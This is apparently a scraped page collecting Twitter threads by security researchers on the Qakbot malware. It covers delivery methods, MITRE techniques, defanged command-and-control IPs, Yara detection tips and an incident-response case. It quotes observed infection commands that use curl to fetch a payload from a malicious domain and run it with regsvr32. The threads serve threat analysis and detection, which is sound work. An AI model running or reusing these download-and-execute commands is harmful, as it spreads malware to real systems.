Discover and read the best of Twitter Threads about #Qakbot
Most recents (10)
#Qakbot threat actors are on fire π₯ recently. We observed a high volume of attacks both internally and through external sources. Here is a brief summary of their current attack chain. π§΅1/6
Qakbot's main initial access vector is still through malspam campaigns βοΈ. They use email thread hijacking for their spam messages to increase the likelihood that the victim user will interact on the message. π§΅2/6 
After a short excursion to OneNote files, both main active #Qakbot botnets have currently returned to using HTML smuggling to deliver the initial attack payload. This technique has already been seen in many campaigns last year. π§΅3/6
#Qakbot once again had some surprises π for us this week. See below for a brief overview of what we found. 𧡠1/6
First and foremost, #Qakbot seems to have departed from their usual use of LNK files to trigger execution. Instead they now present .vbs or .js files at the root folder of the disk image πΏ. 𧡠2/6
This alone would not be significant, since we have observed π .js and .vbs files in Qakbots infection chain before. Now however these files also contain a signature that apparently bypasses Windows MotW / SmartScreen warnings. 𧡠3/6
#Qakbot Infection New TTPs π¨
[+] Deliver ISO (T1204.002)
[+] DLL Search Order Hijacking (T1574.001)π₯
[+] Regsvr32 (T1218.010)
[+] Process Hollowing (T1055.012)
[+] Discovery (TA0007)
[+] Credentials from Web Browsers (T1555.003)
[+] Data from Local System (T1005)
[+] Deliver ISO (T1204.002)
[+] DLL Search Order Hijacking (T1574.001)π₯
[+] Regsvr32 (T1218.010)
[+] Process Hollowing (T1055.012)
[+] Discovery (TA0007)
[+] Credentials from Web Browsers (T1555.003)
[+] Data from Local System (T1005)
#Qakbot New TTPs IMG File Infection
[+] IMG File instead of ISO π₯
[+] VBS Script (ShellExecute) instead of LNK π₯
[+] .tmp (DLL loader) exec via Regsvr32.exe
[+] Process Injection
[+] Discovery commands
[+] C2 connection
#DFIR exec flow: img > vbs > tmp > injection
[+] IMG File instead of ISO π₯
[+] VBS Script (ShellExecute) instead of LNK π₯
[+] .tmp (DLL loader) exec via Regsvr32.exe
[+] Process Injection
[+] Discovery commands
[+] C2 connection
#DFIR exec flow: img > vbs > tmp > injection
#Qakbot C2 server:
IP: 70.121.198[.]103
Port: 2078
Artifact: POST /t5 HTTP/1.1
Additional C2 IPs:
200.93.14[.]206
174.115.87[.]57
102.157.73[.]215
98.30.233[.]14
94.70.37[.]145
82.31.37[.]241
172.90.139[.]138
IP: 70.121.198[.]103
Port: 2078
Artifact: POST /t5 HTTP/1.1
Additional C2 IPs:
200.93.14[.]206
174.115.87[.]57
102.157.73[.]215
98.30.233[.]14
94.70.37[.]145
82.31.37[.]241
172.90.139[.]138
π² Ghidra Tips π²- Malware Encryption and Hashing functions often produce byte sequences that are great for #Yara rules.
Using #Ghidra and a Text Editor - You can quickly develop Yara rules to detect common malware families.
(Demonstrated with #Qakbot)
[1/20]
#Malware #RE
Using #Ghidra and a Text Editor - You can quickly develop Yara rules to detect common malware families.
(Demonstrated with #Qakbot)
[1/20]
#Malware #RE
[2/20]
Hashing and encryption functions make good targets for #detection as they are reasonably unique to each malware family and often contain lengthy and specific byte sequences due to the mathematical operations involved.
These characteristics make for good Yara rules π
Hashing and encryption functions make good targets for #detection as they are reasonably unique to each malware family and often contain lengthy and specific byte sequences due to the mathematical operations involved.
These characteristics make for good Yara rules π
[3/20] The biggest challenge is locating the functions responsible for hashing and encryption. I'll leave that for another thread, but for now...
You can typically recognize hashing/encryption through the use of bitwise operators inside a loop. (xor ^ and shift >> etc).
You can typically recognize hashing/encryption through the use of bitwise operators inside a loop. (xor ^ and shift >> etc).
#Qakbot Dumpulator Script has now been added to Github! π
This script is capable of dumping decrypted strings from the encrypted string table used by recent Qakbot malware.
1/ (notes and details below)
#malware #qakbot #dumpulator #RE
This script is capable of dumping decrypted strings from the encrypted string table used by recent Qakbot malware.
1/ (notes and details below)
#malware #qakbot #dumpulator #RE
2/ The script *should* work on the samples that I have provided in the readme, however you may need to change some register values to get it to work on different samples.
In particular, "dp.regs.ecx" and "dp.regs.esp+0x4" may need to be changed. As these ...
In particular, "dp.regs.ecx" and "dp.regs.esp+0x4" may need to be changed. As these ...
3/ cont'd... as these values point to the encrypted string table and key, which will differ between samples. You can re-use the same dump file if you wish, as the code will likely remain the same.
#Qakbot - AA - url > .zip > .lnk > .dll
MD %HOMEPATH%\XL\zAkOR
curl.exe --output %HOMEPATH%\XL\zAkOR\vE0oHQ.KtIB.q_qw https://fratelliperu.]com/aYMst/A.png
regsvr32 "%HOMEPATH%\XL\zAkOR\vE0oHQ.KtIB.q_qw
bazaar.abuse.ch/sample/617c94aβ¦
IOC
github.com/pr0xylife/Qakbβ¦
MD %HOMEPATH%\XL\zAkOR
curl.exe --output %HOMEPATH%\XL\zAkOR\vE0oHQ.KtIB.q_qw https://fratelliperu.]com/aYMst/A.png
regsvr32 "%HOMEPATH%\XL\zAkOR\vE0oHQ.KtIB.q_qw
bazaar.abuse.ch/sample/617c94aβ¦
IOC
github.com/pr0xylife/Qakbβ¦
++
MD "%HOMEPATH%\qI\ZXOjp
curl.exe --output %HOMEPATH%\qI\ZXOjp\DSVa.BVLl.ae https://arboldeaventuras.]com/uAY4Y/C.png
regsvr32 %HOMEPATH%\qI\ZXOjp\https://t.co/G7DaSz06RB
bazaar.abuse.ch/sample/ba7b459β¦
bazaar.abuse.ch/sample/500f852β¦
MD "%HOMEPATH%\qI\ZXOjp
curl.exe --output %HOMEPATH%\qI\ZXOjp\DSVa.BVLl.ae https://arboldeaventuras.]com/uAY4Y/C.png
regsvr32 %HOMEPATH%\qI\ZXOjp\https://t.co/G7DaSz06RB
bazaar.abuse.ch/sample/ba7b459β¦
bazaar.abuse.ch/sample/500f852β¦
1/ Visibility is key for eradication π₯·
In a recent IR case, the TA created persistences with #QakBot on almost every system in the network.
If only individual systems in the network were forensically examined, one or more infected systems would undoubtedly be missed.
π§΅
In a recent IR case, the TA created persistences with #QakBot on almost every system in the network.
If only individual systems in the network were forensically examined, one or more infected systems would undoubtedly be missed.
π§΅
2/ By examing the network connections made by the clients & servers with a forensic agent, it is apparent that QakBot has made a process injection into the following two processes:
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\mobsync.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\mobsync.exe
3/ The analysis of the network connections gives us active C2 addresses that we can use for additional hunting inside the network (and in the FW logs).
ICYMI, @PwC_UKβs 2020 #threatintel Year in Retrospect report is out now! All team contributed but h/t to @KystleM_Reid! :fire: You can check it out here: pwc.to/2ZPx7fo In this thread, I will summarise some of what I thought were key findings: π§΅π 1/n
#Ransomware has become the most significant cyber security threat faced by organisations, irrespective of industry/location. TTPs have pivoted to mass data exfiltration prior to encryption, along with leaks & extortion. S/o to @andyp346 for all your work countering this.π 2/n
In 2020, 86% of the incidents that PwCβs Incident Response team responded to were attributable to cyber criminals. 79% of leaks happened in 2nd half of 2020. Our data sees Manufacturing, TMT, & Professional Services most impacted. 3/n
